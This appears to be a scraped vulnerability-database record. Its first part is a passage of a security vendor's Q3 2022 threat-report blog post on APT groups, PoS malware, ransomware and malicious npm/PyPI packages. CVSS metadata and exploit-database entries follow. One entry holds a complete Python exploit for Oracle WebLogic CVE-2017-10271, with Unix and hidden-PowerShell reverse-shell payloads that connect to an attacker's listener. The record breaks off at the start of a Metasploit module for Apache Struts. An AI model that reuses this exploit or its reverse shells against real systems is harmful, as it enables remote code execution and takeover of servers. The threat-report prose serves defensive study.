DeathStalker](<https://securelist.com/deathstalker-mercenary-triumvirate/98177/>) and its activities, including the Janicab, Evilnum and PowerSing campaigns. Later that year, we documented the [PowerPepper](<https://securelist.com/what-did-deathstalker-hide-between-two-ferns/99616/>) campaign. We believe DeathStalker to be a group of mercenaries, offering hack-for-hire services, or acting as an information broker to support competitive and financial intelligence efforts. Meanwhile, in August 2020, we also released a private report on VileRAT for our threat intelligence customers. VileRAT is a Python implant, part of [an evasive and highly intricate attack campaign](<https://securelist.com/vilerat-deathstalkers-continuous-strike/107075/>) against foreign exchange and cryptocurrency trading companies. We discovered it in Q2 2020 as part of an update of Evilnum, and attributed it to DeathStalker.\n\nSince we first identified it, DeathStalker has continuously updated and used its VileRAT tool-chain against the same type of targets.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/05135347/VileRAT_DeathStalkers_continuous_strike_02.png>)\n\nThe threat actor has also sought to escape detection. However, the VileRAT campaign took this to another level: it is undoubtedly the most intricate, obfuscated and tentatively evasive campaign we have ever identified from DeathStalker. From state-of-the-art obfuscation with VBA and JavaScript, to multi-layered and low-level packing with Python, a robust multi-stage in-memory PE loader and security vendor-specific heuristic bypasses \u2013 the threat actor has left nothing to chance. On top of this, DeathStalker has developed a vast and quickly changing infrastructure as well.\n\nOn the other side, there are some glitches and inconsistencies. VileRAT, the final payload in the tool-chain is more than 10MB in size. The group uses simple infection vectors, many suspicious communication patterns, noisy and easy-to-identify process executions or file deployments, as well as sketchy development practices leaving bugs that require frequent implant updates. For these reasons, an effective endpoint solution will still be able to detect and block most VileRAT-related malicious activities.\n\nUsing only data that we could verify with our own telemetry, we identified 10 organizations compromised or targeted by DeathStalker since 2020 \u2013 in Bulgaria, Cyprus, Germany, the Grenadines, Kuwait, Malta, the UAE and the Russian Federation.\n\nWe do not know what DeathStalker&#x27;s principal intention is in targeting these organizations: this could range from due diligence, asset recovery, information gathering in the context of litigation or arbitration cases, aiding customers to bypass sanctions and/or spying on targets&#x27; customers. However, it does not appear to be direct financial gain.\n\n### Kimsuky&#x27;s GoldDragon cluster and C2 operations\n\nKimsuky is a prolific and active threat actor primarily targeting North Korea-related entities. Like other sophisticated adversaries, this group updates its tools frequently. We recently had the chance to investigate how the threat actor configures its GoldDragon cluster and what kind of tricks it uses to confirm and further validate its victims. The Kimsuky group has configured multi-stage C2 servers with various commercial hosting services located around the world.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/22113157/Kimsukys_GoldDragon_03.png>)\n\nThe attacks occur in several stages. First, the threat actor sends a spear-phishing email to the potential victim with a lure to download additional documents. If the victim clicks the link, it results in a connection to the first-stage C2 server, with an email address as a parameter. The first-stage C2 server verifies that the incoming email address parameter is expected and delivers the malicious document if it&#x27;s in the target list. The first-stage script also forwards the victim&#x27;s IP address to the next-stage server. When the fetched document is opened, it connects to the second C2 server. The corresponding script on the second C2 server checks the IP address forwarded from the first-stage server to verify that it&#x27;s an expected request from the same victim. Using this IP validation scheme, the actor verifies whether the incoming request is from the victim or not. On top of that, the operator relies on several other processes to carefully deliver the next payload. Another C2 script on the second C2 server checks the operating system type and predefined user-agent strings to filter out requests from security researchers or auto-analysis systems.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/22112947/Kimsukys_GoldDragon_01.png>)\n\nBased on the contents of the decoy document, we hypothesize that the targets of this operation are people or entities related to political or diplomatic activities. We know that historically politicians, diplomats, journalists, professors and North Korean defectors have been prime targets of the Kimsuky group. The email address names from the C2 scripts help to confirm this hypothesis.\n\nOur [research](<https://securelist.com/kimsukys-golddragon-cluster-and-its-c2-operations/107258/>) underlines how Kimsuky pays close attention to validating its victims and delivering the next-stage payloads to them, while taking steps to make analysis difficult.\n\n### Targeted attacks on industrial enterprises\n\nIn August, Kaspersky ICS CERT experts reported [a wave of targeted attacks on military industrial complex enterprises and public institutions](<https://ics-cert.kaspersky.com/publications/reports/2022/08/08/targeted-attack-on-industrial-enterprises-and-public-institutions/?utm_source=securelist&utm_medium=link&utm_campaign=targeted-attack-on-industrial-enterprises-and-public-institutions>) in Belarus, Russia, Ukraine and Afghanistan. The attacks, which took place earlier this year, affected industrial plants, design bureaus and research institutes, government agencies, ministries and departments. We identified more than a dozen targets, and observed significant overlaps in TTPs (Tactics, Techniques and Procedures) with the threat actor TA428.\n\nThe attackers gained access to the enterprise network using carefully crafted phishing emails. Some of the information they contained is not publicly available, indicating that the attackers conducted reconnaissance ahead of the attack, possibly using information obtained in earlier attacks on the target organization or others associated with the target. Microsoft Word documents attached to the phishing emails contained malicious code that exploits the [CVE-2017-11882](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11882>) vulnerability, which enables an attacker to execute arbitrary code \u2013 in this case, the main module of the PortDoor backdoor \u2013 without any additional user action.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/03155648/APT_TA428_targeted_attack_01.png>)\n\nThe attackers used five different backdoors at the same time \u2013 probably for redundancy. They provide extensive functionality for controlling infected systems and collecting confidential data. Once they have gained initial access, the attackers attempt to spread to other computers on the network. Once they have obtained domain administrator privileges, they search for, and exfiltrate, sensitive data to their servers hosted in different countries \u2013 these servers are also used as first-stage C2 servers. The attackers compress stolen files into encrypted and password-protected ZIP archives. After receiving the data, the first-stage C2 servers forward the archives to a second-stage server located in China.\n\n## Other malware\n\n### Prilex: the pricey prickle credit card complex\n\nPrilex, active since 2014, is a well-known threat actor targeting ATMs and Point of Sale (PoS) terminals. In 2016, the group began to focus all its activities on PoS systems. Since then the group has greatly improved its malware: it develops complex threats and poses a major threat to the payment chain. Prilex is now conducting so-called &quot;GHOST&quot; attacks \u2013 fraudulent transactions using cryptograms, which are pre-generated by the victim&#x27;s card during the store payment process.\n\nThe group delivers its malware using social engineering. The cybercriminals call their chosen target and tell them their PoS software needs to be updated by a technician. Later, the fake technician goes to the targeted company in person and infects the machines. Alternatively, they persuade the target to install AnyDesk and use this to install the malware remotely.\n\nPrior to striking victims, the cybercriminals perform an initial screening of the machine, in order to check the number of transactions that have already taken place and whether this target is worth attacking. If so, the malware captures any running transaction and modifies its content in order to be able to capture the card information. All the captured card details are then saved to an encrypted file, which is later sent to the attackers&#x27; server, allowing them to make transactions through a fraudulent PoS device registered in the name of a fake company.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/09/28092316/Prilex_ATM_and_PoS_report_10_1.png>)\n\nHaving attacked one PoS system, the cybercriminals obtain data from dozens, or even hundreds, of cards daily. It is especially dangerous if the infected machines are located in popular shopping malls in densely populated cities, where the daily flow of customers can reach thousands of people.\n\nIn [our recent investigation](<https://securelist.com/prilex-atm-pos-malware-evolution/107551/>), we discovered that the Prilex group is controlling the development lifecycle of its malware using Subversion \u2013 used by professional development teams. Moreover, there is also a supposed official Prilex website selling its malware kits to other cybercriminals as Malware-as-a-Service (MaaS). Prilex has previously sold various versions of its malware on the [dark web](<https://encyclopedia.kaspersky.com/glossary/dark-web/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>), for example, in 2019 a German bank [lost more than \u20ac1.5 million](<https://www.zdnet.com/article/german-bank-loses-eur1-5-million-in-mysterious-cashout-of-emv-cards/>) in a similar attack by the Prilex malware. The development of its MasS operation means that highly sophisticated and dangerous PoS malware could spread to many countries, increasing the risk of multimillion-dollar losses for businesses all around the world.\n\nWe also discovered web sites and Telegram chats where cybercriminals sell Prilex malware. Posing as the Prilex group itself, they offer the latest versions of PoS malware, costing from $3,500 to $13,000. We are not sure about the real ownership of these web sites, as they could be copycats.\n\n### Luna and Black Basta: new ransomware for Windows, Linux and ESXi\n\nRansomware groups have increasingly targeted not only Windows computers, but also Linux devices and ESXi virtual machines. We highlighted one example earlier this year \u2013 the [BlackCat](<https://www.kaspersky.com/blog/black-cat-ransomware/44120/>) gang, which distributes malware written in the cross-platform language Rust. We recently analyzed two other malware families that provide similar functionality: [Black Basta and Luna](<https://securelist.com/luna-black-basta-ransomware/106950/>).\n\nBlack Basta, first discovered in February, exists in versions for Windows and for Linux \u2013 the latter primarily targeting ESXi virtual machine images. One of the key features of the Windows version is that it boots the system in Safe Mode before encrypting data: this allows the malware to evade detection by security solutions, many of which don&#x27;t work in Safe Mode.\n\nAt the time we published our report, Black Basta operators had released information on 40 victims, among them manufacturing and electronics firms, contractors, and others, located in the US, Australia, Europe, Asia and Latin America.\n\nLuna, discovered in June and also written in Rust, is able to encrypt both Windows and Linux devices, as well as ESXi virtual machine images. In an advert on the dark web, the cybercriminals claim to co-operate only with Russian-speaking partners. This means that the targets of interest to the attackers are most likely located outside the former Soviet Union. This is also borne out by the fact that the ransom note embedded into the code of the ransomware is written in English, albeit with mistakes.\n\n### Malicious packages in online code repositories\n\nIn July, we reported a malicious campaign that we named [LofyLife](<https://securelist.com/lofylife-malicious-npm-packages/107014/>). Using our internal automated system for monitoring open-source repositories, our researchers identified four malicious packages spreading Volt Stealer and Lofy Stealer malware in the npm repository.\n\nThe identified malicious packages appeared to be used for ordinary tasks such as formatting headlines or certain gaming functions. The &quot;formatting headlines&quot; package was in Brazilian Portuguese with a &quot;#brazil&quot; hashtag, suggesting that the attackers were seeking to target people based in Brazil. Other packages were presented in English, so they could be targeting users from other countries.\n\nThe packages contained highly obfuscated malicious JavaScript and Python code. This made them harder to analyze when being uploaded to the repository. The malicious payload consisted of malware written in Python dubbed Volt Stealer \u2013 an open-source malicious script \u2013 and JavaScript malware dubbed Lofy Stealer. Volt Stealer was used to steal Discord tokens from infected machines, along with the victim&#x27;s IP address, and upload them via HTTP. Lofy Stealer infects Discord client files and monitors the victim&#x27;s actions, detecting when a person logs in, changes the registered email or password, enables or disables multi-factor authentication and adds new payment methods (in which case the malware steals full credit card details). It uploads collected information to a remote endpoint.\n\nThe npm repository is an open-source home for JavaScript developers to share and reuse code for building various web applications. As such, it represents a significant supply chain that, if exploited by attackers, can be used to deliver malware to many people. [This is not the first time we&#x27;ve seen an npm package poisoned in this way](<https://www.kaspersky.com/blog/uaparser-js-infected-versions/42700/>).\n\nnpm is not the only such code repository to have been targeted recently. In August, Check Point [published a report](<https://research.checkpoint.com/2022/cloudguard-spectral-detects-several-malicious-packages-on-pypi-the-official-software-repository-for-python-developers/>) on 10 malicious Python packages in the Python Package Index (PyPI), the most popular Python repository among software developers. The malicious packages were intended to steal developers&#x27; personal data and credentials. Following this research, [we discovered two other malicious Python packages in the PyPI](<https://securelist.com/two-more-malicious-python-packages-in-the-pypi/107218/>), masquerading as one of the most popular open-source packages named &quot;[requests](<https://pypi.org/project/requests/#files>)&quot;.\n\nThe attacker used a description of the legitimate &quot;requests&quot; package in order to trick victims into installing a malicious one. In addition, the description contained fake statistics and the project description referenced the web pages of the original &quot;requests&quot; package, as well as the author&#x27;s email. All mentions of the legitimate package&#x27;s name were replaced with the name of the malicious one.\n\n### Cyberthreats facing gamers\n\nThe gaming industry is huge and growing. The industry attracts [an audience of more than 3 billion people worldwide](<https://newzoo.com/insights/articles/games-market-engagement-revenues-trends-2020-2023-gaming-report>) \u2013 a huge pool of potential victims for cybercriminals who target this sector. Cybercriminals make extensive use of social engineering tricks to entice potential victims into installing malware: [the promise of an Android version of a game that&#x27;s not on Google Play](<https://www.kaspersky.com/blog/fortnite-security/23685/>); [the chance to play games for free](<https://www.kaspersky.com/blog/free-smartphone-games/37303/>); access to game cheats; etc.\n\nWe recently published our [report on gaming-related threats](<https://securelist.com/gaming-related-cyberthreats-2021-2022/107346/>) in 2021\u201322. Here are some of the key headlines:\n\n * In the year up to June 2022, Kaspersky blocked gaming-related malware and unwanted software on the computers of 384,224 people, with 91,984 files distributed under the guise of 28 games.\n * The top five PC games used as bait in these attacks were Minecraft, Roblox, Need for Speed, Grand Theft Auto and Call of Duty.\n * The top five mobile games used as a lure to target gamers were Minecraft, Roblox, Grand Theft Auto, PUBG and FIFA.\n * Malware and unwanted software distributed as cheat programs stand out as a particular threat to gamers&#x27; security. In the year to June 2022, we detected 3,154 unique files of this type, affecting 13,689 people.\n * Miners pose an increasing threat, with Far Cry, Roblox, Minecraft, Valorant and FIFA heading the list of games and game series that cybercriminals used as a lure for such threats.\n\nAmong the top threats is RedLine, which we deemed worthy of a [separate report](<https://securelist.com/self-spreading-stealer-attacks-gamers-via-youtube/107407/>). The attackers distribute this password-stealing Trojan under the guise of game cheats in an attempt to steal accounts, card numbers, crypto-wallets and more. They post videos on YouTube purportedly about how to use cheats in popular online games such as Rust, FIFA 22, DayZ and others. The videos prompt the victim to follow a link in the description to download and run a self-extracting archive.\n\nThe Trojan, once installed, steals account passwords, credit card details, session cookies and more. RedLine is also able to execute commands on the computer, as well as download and install other programs onto the infected machine.\n\nRedLine also comes with a cryptocurrency miner. Gaming computers are a logical target for cybercriminals, since they typically have powerful GPUs \u2013 useful for cryptocurrency mining.\n\nIn addition to losing sensitive data, the player&#x27;s reputation is at stake. RedLine downloads videos from the C2 server and posts them on the victim&#x27;s YouTube channel \u2013 the same video that led the gamer to become infected. In this way, they become the means by which other gamers become infected.\n\n### NullMixer: oodles of Trojans in a single dropper\n\nTrying to save money by using unlicensed software can be costly: a single file downloaded from an unreliable source can result in system compromise. In September, we published our analysis of NullMixer, a Trojan dropper designed to drop a wide variety of malware families.\n\nNullMixer spreads via malicious web sites that can be accessed using standard search engines. Often, the web sites host &quot;cracks&quot;, &quot;keygens&quot; and activators for downloading software illegally: they pretend to be legitimate, but actually contain a malware dropper. They stay at the top of search engine results using SEO.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/09/23132345/NullMixer_report_01.png>)\n\nWhen someone attempts to download software from one of these sites, they are redirected multiple times, ending up on a page containing download instructions and archived password-protected malware masquerading as the desired piece of software. When they extract and execute the file, the malware drops a number of malicious files to the compromised machine. The malware families dropped onto the computer include SmokeLoader/Smoke, LgoogLoader, Disbuk, RedLine (described above), Fabookie and ColdStealer, consisting of backdoors, spyware, bankers, credential stealers, droppers and more.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/09/23170555/NullMixer_report_06.jpg>)\n\nOnce all the dropped files have been launched, the NullMixer starter beacons to the C2 to confirm the successful installation. The dropped files are then left to their own devices.\n\nSince the beginning of the year, we have blocked attempts to infect more than 47,778 people worldwide. Some of the most targeted countries are Brazil, India, Russia, Italy, Germany, France, Egypt, Turkey and the US.\n\nMany of the malware families dropped by NullMixer are downloaders, which suggests that infections will not be limited to the malware families described in [our report](<https://securelist.com/nullmixer-oodles-of-trojans-in-a-single-dropper/107498/>). Many of the other malware families mentioned here are stealers, and compromised credentials can be used for further attacks inside a local network.\n\n### Potential threat in the browser\n\nBrowser extensions are very useful for blocking ads, keeping a to-do list, spellchecking, translating text and much more. They are also popular: Chrome, Safari, Mozilla and other browsers have their own online stores distributing thousands of extensions \u2013 and the most popular plug-ins there reach over 10 million people. However, extensions are not always secure; and even seemingly innocent add-ons can present a real risk.\n\nMalicious and unwanted add-ons promote themselves as useful, and often do have legitimate functions implemented along with malicious ones. Some impersonate popular legitimate extensions. Often, such add-ons are distributed through official marketplaces. In 2020, Google [removed](<https://threatpost.com/google-yanks-106-malicious-chrome-extensions/156731/>) 106 browser extensions from its Chrome Web Store \u2013 all siphoned off sensitive user data, such as cookies and passwords, and even took screenshots. These extensions had been downloaded 32 million times.\n\nIt&#x27;s always good to check the permissions an extension requests during installation. And if it&#x27;s asking for permission to do things that don&#x27;t seem appropriate, don&#x27;t install it. For example, a browser calculator that asks for access to geolocation or browsing history. However, it&#x27;s not always so clear. Often the wording is so vague that it is impossible to tell exactly how secure an extension is. Basic extensions often require permission to &quot;read and change all your data on the websites you visit&quot;. They may really need it in order to function properly, but this permission gives the extension wide powers.\n\nEven if not malicious, they can still be dangerous. Many collect massive amounts of data from web pages people visit. To earn more money, some developers [may pass](<https://www.pcworld.com/article/410966/web-of-trust-browser-extensions-yanked-after-proving-untrustworthy.html>) it on to third parties or sell it to advertisers. If that data is not anonymized properly, information about web sites that people visit and what they do there could be exposed to third parties.\n\nExtension developers are also able to push updates without requiring any action by the person who installed it. Even a legitimate extension could be later hijacked to install malware.\n\nWe recently published an [overview of the types of threat that mimic useful web-browser extensions and statistics on attacks](<https://securelist.com/threat-in-your-browser-extensions/107181/>), using data from the Kaspersky Security Network (KSN), for the period between January 2020 and June 2022.\n\nIn the first half of this year, 1,311,557 people tried to download malicious or unwanted extensions at least once, which is more than 70 percent affected by the same threat in the whole of last year.\n\nFrom January 2020 to June 2022, adware hiding in browser extensions affected more than 4.3 million people, which is approximately 70 percent of all people affected by malicious and unwanted add-ons.\n\nThe most common threat in the first half of 2022 was the WebSearch family of adware extensions, able to collect and analyze search queries and redirect people to affiliate links.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-11-18T08:00:32", "type": "securelist", "title": "IT threat evolution Q3 2022", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10271", "CVE-2017-11882"], "modified": "2022-11-18T08:00:32", "id": "SECURELIST:F4445BFDE49DF55279E5B69E613E7CA2", "href": "https://securelist.com/it-threat-evolution-q3-2022/107957/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-03-21T00:16:24", "description": "The Oracle WebLogic WLS WSAT component is vulnerable to an XML deserialization remote code execution vulnerability. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0.", "cvss3": {}, "published": "2018-01-29T00:00:00", "type": "zdt", "title": "Oracle WebLogic - wls-wsat Component Deserialization Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-10271"], "modified": "2018-01-29T00:00:00", "id": "1337DAY-ID-29668", "href": "https://0day.today/exploit/description/29668", "sourceData": "", "sourceHref": "https://0day.today/exploit/29668", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-04-14T17:44:57", "description": "Exploit for multiple platform in category remote exploits", "cvss3": {}, "published": "2018-01-08T00:00:00", "type": "zdt", "title": "Oracle WebLogic < 10.3.6 - wls-wsat Component Deserialisation Remote Command Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-10271"], "modified": "2018-01-08T00:00:00", "id": "1337DAY-ID-29395", "href": "https://0day.today/exploit/description/29395", "sourceData": "#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n# Exploit Title: Weblogic wls-wsat Component Deserialization RCE\r\n# Date Authored: Jan 3, 2018\r\n# Date Announced: 10/19/2017\r\n# Exploit Author: Kevin Kirsche (d3c3pt10n)\r\n# Exploit Github: https://github.com/kkirsche/CVE-2017-10271\r\n# Exploit is based off of POC by Luffin from Github\r\n# https://github.com/Luffin/CVE-2017-10271\r\n# Vendor Homepage: http://www.oracle.com/technetwork/middleware/weblogic/overview/index.html\r\n# Version: 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0\r\n# Tested on: Oracle WebLogic 10.3.6.0.0 running on Oracle Linux 6.8 and Ubuntu 14.04.4 LTS\r\n# CVE: CVE-2017-10271\r\n# Usage: python exploit.py -l 10.10.10.10 -p 4444 -r http://will.bepwned.com:7001/\r\n# (Python 3) Example check listener: python3 -m http.server 4444\r\n# (Python 2) Example check listener: python -m SimpleHTTPServer 4444\r\n# (Netcat) Example exploit listener: nc -nlvp 4444\r\n \r\nfrom sys import exit\r\nfrom requests import post\r\nfrom argparse import ArgumentParser\r\nfrom random import choice\r\nfrom string import ascii_uppercase, ascii_lowercase, digits\r\nfrom xml.sax.saxutils import escape\r\n \r\nclass Exploit:\r\n \r\n def __init__(self, check, rhost, lhost, lport, windows):\r\n self.url = rhost if not rhost.endswith('/') else rhost.strip('/')\r\n self.lhost = lhost\r\n self.lport = lport\r\n self.check = check\r\n if windows:\r\n self.target = 'win'\r\n else:\r\n self.target = 'unix'\r\n \r\n if self.target == 'unix':\r\n # Unix reverse shell\r\n # You should also be able to instead use something from MSFVenom. E.g.\r\n # msfvenom -p cmd/unix/reverse_python LHOST=10.10.10.10 LPORT=4444\r\n self.cmd_payload = (\r\n \"python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.\"\r\n \"SOCK_STREAM);s.connect((\\\"{lhost}\\\",{lport}));os.dup2(s.fileno(),0); os.dup2(\"\r\n \"s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"]);'\"\r\n ).format(lhost=self.lhost, lport=self.lport)\r\n else:\r\n # Windows reverse shell\r\n # Based on msfvenom -p cmd/windows/reverse_powershell LHOST=10.10.10.10 LPORT=4444\r\n self.cmd_payload = (\r\n r\"powershell -w hidden -nop -c function RSC{if ($c.Connected -eq $true) \"\r\n r\"{$c.Close()};if ($p.ExitCode -ne $null) {$p.Close()};exit;};$a='\" + self.lhost +\"\"\r\n r\"';$p='\"+ self.lport + \"';$c=New-Object system.net.sockets.tcpclient;$c.connect($a\"\r\n r\",$p);$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize;\"\r\n r\"$p=New-Object System.Diagnostics.Process;$p.StartInfo.FileName='cmd.exe';\"\r\n r\"$p.StartInfo.RedirectStandardInput=1;$p.StartInfo.RedirectStandardOutput=1;\"\r\n r\"$p.StartInfo.UseShellExecute=0;$p.Start();$is=$p.StandardInput;\"\r\n r\"$os=$p.StandardOutput;Start-Sleep 1;$e=new-object System.Text.AsciiEncoding;\"\r\n r\"while($os.Peek() -ne -1){$o += $e.GetString($os.Read())};\"\r\n r\"$s.Write($e.GetBytes($o),0,$o.Length);$o=$null;$d=$false;$t=0;\"\r\n r\"while (-not $d) {if ($c.Connected -ne $true) {RSC};$pos=0;$i=1; while (($i -gt 0)\"\r\n r\" -and ($pos -lt $nb.Length)) {$r=$s.Read($nb,$pos,$nb.Length - $pos);$pos+=$r;\"\r\n r\"if (-not $pos -or $pos -eq 0) {RSC};if ($nb[0..$($pos-1)] -contains 10) {break}};\"\r\n r\"if ($pos -gt 0){$str=$e.GetString($nb,0,$pos);$is.write($str);start-sleep 1;if \"\r\n r\"($p.ExitCode -ne $null){RSC}else{$o=$e.GetString($os.Read());while($os.Peek() -ne\"\r\n r\" -1){$o += $e.GetString($os.Read());if ($o -eq $str) {$o=''}};$s.Write($e.\"\r\n r\"GetBytes($o),0,$o.length);$o=$null;$str=$null}}else{RSC}};\"\r\n )\r\n self.cmd_payload = escape(self.cmd_payload)\r\n \r\n def cmd_base(self):\r\n if self.target == 'win':\r\n return 'cmd'\r\n return '/bin/sh'\r\n \r\n def cmd_opt(self):\r\n if self.target == 'win':\r\n return '/c'\r\n return '-c'\r\n \r\n \r\n def get_generic_check_payload(self):\r\n random_uri = ''.join(\r\n choice(ascii_uppercase + ascii_lowercase + digits)\r\n for _ in range(16))\r\n generic_check_payload = '''<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\r\n <soapenv:Header>\r\n <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\r\n <java version=\"1.8\" class=\"java.beans.XMLDecoder\">\r\n <object id=\"url\" class=\"java.net.URL\">\r\n <string>http://{lhost}:{lport}/{random_uri}</string>\r\n </object>\r\n <object idref=\"url\">\r\n <void id=\"stream\" method = \"openStream\" />\r\n </object>\r\n </java>\r\n </work:WorkContext>\r\n </soapenv:Header>\r\n <soapenv:Body/>\r\n</soapenv:Envelope>\r\n'''\r\n \r\n return generic_check_payload.format(\r\n lhost=self.lhost, lport=self.lport, random_uri=random_uri)\r\n \r\n def get_process_builder_payload(self):\r\n process_builder_payload = '''<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\r\n <soapenv:Header>\r\n <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\r\n <java>\r\n <object class=\"java.lang.ProcessBuilder\">\r\n <array class=\"java.lang.String\" length=\"3\" >\r\n <void index=\"0\">\r\n <string>{cmd_base}</string>\r\n </void>\r\n <void index=\"1\">\r\n <string>{cmd_opt}</string>\r\n </void>\r\n <void index=\"2\">\r\n <string>{cmd_payload}</string>\r\n </void>\r\n </array>\r\n <void method=\"start\"/>\r\n </object>\r\n </java>\r\n </work:WorkContext>\r\n </soapenv:Header>\r\n <soapenv:Body/>\r\n</soapenv:Envelope>\r\n'''\r\n return process_builder_payload.format(cmd_base=self.cmd_base(), cmd_opt=self.cmd_opt(),\r\n cmd_payload=self.cmd_payload)\r\n \r\n def print_banner(self):\r\n print(\"=\" * 80)\r\n print(\"CVE-2017-10271 RCE Exploit\")\r\n print(\"written by: Kevin Kirsche (d3c3pt10n)\")\r\n print(\"Remote Target: {rhost}\".format(rhost=self.url))\r\n print(\"Shell Listener: {lhost}:{lport}\".format(\r\n lhost=self.lhost, lport=self.lport))\r\n print(\"=\" * 80)\r\n \r\n def post_exploit(self, data):\r\n headers = {\r\n \"Content-Type\":\r\n \"text/xml;charset=UTF-8\",\r\n \"User-Agent\":\r\n \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36\"\r\n }\r\n payload = \"/wls-wsat/CoordinatorPortType\"\r\n \r\n vulnurl = self.url + payload\r\n try:\r\n req = post(\r\n vulnurl, data=data, headers=headers, timeout=10, verify=False)\r\n if self.check:\r\n print(\"[*] Did you get an HTTP GET request back?\")\r\n else:\r\n print(\"[*] Did you get a shell back?\")\r\n except Exception as e:\r\n print('[!] Connection Error')\r\n print(e)\r\n \r\n def run(self):\r\n self.print_banner()\r\n if self.check:\r\n print('[+] Generating generic check payload')\r\n payload = self.get_generic_check_payload()\r\n else:\r\n print('[+] Generating execution payload')\r\n payload = self.get_process_builder_payload()\r\n print('[*] Generated:')\r\n print(payload)\r\n if self.check:\r\n print('[+] Running generic check payload')\r\n else:\r\n print('[+] Running {target} execute payload').format(target=self.target)\r\n \r\n self.post_exploit(data=payload)\r\n \r\n \r\nif __name__ == \"__main__\":\r\n parser = ArgumentParser(\r\n description=\r\n 'CVE-2017-10271 Oracle WebLogic Server WLS Security exploit. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0.'\r\n )\r\n parser.add_argument(\r\n '-l',\r\n '--lhost',\r\n required=True,\r\n dest='lhost',\r\n nargs='?',\r\n help='The listening host that the remote server should connect back to')\r\n parser.add_argument(\r\n '-p',\r\n '--lport',\r\n required=True,\r\n dest='lport',\r\n nargs='?',\r\n help='The listening port that the remote server should connect back to')\r\n parser.add_argument(\r\n '-r',\r\n '--rhost',\r\n required=True,\r\n dest='rhost',\r\n nargs='?',\r\n help='The remote host base URL that we should send the exploit to')\r\n parser.add_argument(\r\n '-c',\r\n '--check',\r\n dest='check',\r\n action='store_true',\r\n help=\r\n 'Execute a check using HTTP to see if the host is vulnerable. This will cause the host to issue an HTTP request. This is a generic check.'\r\n )\r\n parser.add_argument(\r\n '-w',\r\n '--win',\r\n dest='windows',\r\n action='store_true',\r\n help=\r\n 'Use the windows cmd payload instead of unix payload (execute mode only).'\r\n )\r\n \r\n args = parser.parse_args()\r\n \r\n exploit = Exploit(\r\n check=args.check, rhost=args.rhost, lhost=args.lhost, lport=args.lport,\r\n windows=args.windows)\r\n exploit.run()\n\n# 0day.today [2018-04-14] #", "sourceHref": "https://0day.today/exploit/29395", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-03-20T05:11:11", "description": "This Metasploit module exploits a remote code execution vulnerability in Apache Struts version 2.3.5 - 2.3.31, and 2.5 - 2.5.10. Remote Code Execution can be performed via http Content-Type header. Native payloads will be converted to executables and dropped in the server's temp dir. If this fails, try a cmd/* payload, which won't have to write to the disk.", "cvss3": {}, "published": "2017-03-15T00:00:00", "type": "zdt", "title": "Apache Struts Jakarta Multipart Parser OGNL Injection Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-15T00:00:00", "id": "1337DAY-ID-27316", "href": "https://0day.today/exploit/description/27316", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::EXE\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Apache Struts Jakarta Multipart Parser 